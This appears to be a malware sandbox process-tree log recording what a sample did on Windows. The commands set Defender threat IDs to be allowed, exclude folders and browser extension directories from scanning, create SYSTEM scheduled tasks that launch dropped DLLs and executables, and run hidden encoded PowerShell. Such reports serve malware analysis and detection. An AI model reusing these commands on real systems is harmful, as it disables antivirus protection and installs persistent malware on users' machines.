C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4736
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4952
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FryTaOrDbWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FryTaOrDbWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\amAbAfOnXOhKC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\amAbAfOnXOhKC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mGmtaSbzEpNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mGmtaSbzEpNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAxUdthdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAxUdthdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LzVMcwpfdAtFXBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LzVMcwpfdAtFXBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qUDHiGcWmqaEfibr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qUDHiGcWmqaEfibr\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FryTaOrDbWUn" /t REG_DWORD /d 0 /reg:323⤵PID:4448
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FryTaOrDbWUn" /t REG_DWORD /d 0 /reg:324⤵PID:3188
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FryTaOrDbWUn" /t REG_DWORD /d 0 /reg:643⤵PID:4916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\amAbAfOnXOhKC" /t REG_DWORD /d 0 /reg:323⤵PID:4080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\amAbAfOnXOhKC" /t REG_DWORD /d 0 /reg:643⤵PID:4100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR" /t REG_DWORD /d 0 /reg:323⤵PID:3284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR" /t REG_DWORD /d 0 /reg:643⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mGmtaSbzEpNU2" /t REG_DWORD /d 0 /reg:323⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mGmtaSbzEpNU2" /t REG_DWORD /d 0 /reg:643⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAxUdthdU" /t REG_DWORD /d 0 /reg:323⤵PID:4456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAxUdthdU" /t REG_DWORD /d 0 /reg:643⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LzVMcwpfdAtFXBVB /t REG_DWORD /d 0 /reg:323⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LzVMcwpfdAtFXBVB /t REG_DWORD /d 0 /reg:643⤵PID:4976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc /t REG_DWORD /d 0 /reg:323⤵PID:632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc /t REG_DWORD /d 0 /reg:643⤵PID:492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qUDHiGcWmqaEfibr /t REG_DWORD /d 0 /reg:323⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qUDHiGcWmqaEfibr /t REG_DWORD /d 0 /reg:643⤵PID:3748
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmUGuXOUf" /SC once /ST 02:04:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmUGuXOUf"2⤵PID:3200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmUGuXOUf"2⤵PID:4668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eMHQCETsWPnVYjMqf" /SC once /ST 00:54:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\qUDHiGcWmqaEfibr\GlgcQoiPCSwQOyx\YDrPjem.exe\" fx /Wjsite_idpQA 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "eMHQCETsWPnVYjMqf"2⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5016 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2248
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4168
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5088
-
C:\Windows\Temp\qUDHiGcWmqaEfibr\GlgcQoiPCSwQOyx\YDrPjem.exeC:\Windows\Temp\qUDHiGcWmqaEfibr\GlgcQoiPCSwQOyx\YDrPjem.exe fx /Wjsite_idpQA 385118 /S1⤵
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bgNHpsssZstYPMxCCI"2⤵PID:2348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3440
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:1392
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\uAxUdthdU\wOArEU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jPOTMwMCmHcirds" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jPOTMwMCmHcirds2" /F /xml "C:\Program Files (x86)\uAxUdthdU\udbPYCB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jPOTMwMCmHcirds"2⤵PID:1416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jPOTMwMCmHcirds"2⤵PID:4964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "whNpKAYIgQFCYS" /F /xml "C:\Program Files (x86)\mGmtaSbzEpNU2\mtDkEIX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VorZEZvfxDgAA2" /F /xml "C:\ProgramData\LzVMcwpfdAtFXBVB\qpKobsu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QlJRMvXkVaNCqnanL2" /F /xml "C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR\fDPNxpS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MZVwMBQmBZUQSHnTmpg2" /F /xml "C:\Program Files (x86)\amAbAfOnXOhKC\HxmFsRe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iQotdfZjyOUckLeEG" /SC once /ST 03:08:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\qUDHiGcWmqaEfibr\QCEMiQxb\PPZmDzM.dll\",#1 /Rjsite_idJQh 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "iQotdfZjyOUckLeEG"2⤵PID:3032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eMHQCETsWPnVYjMqf"2⤵PID:1956
-
-
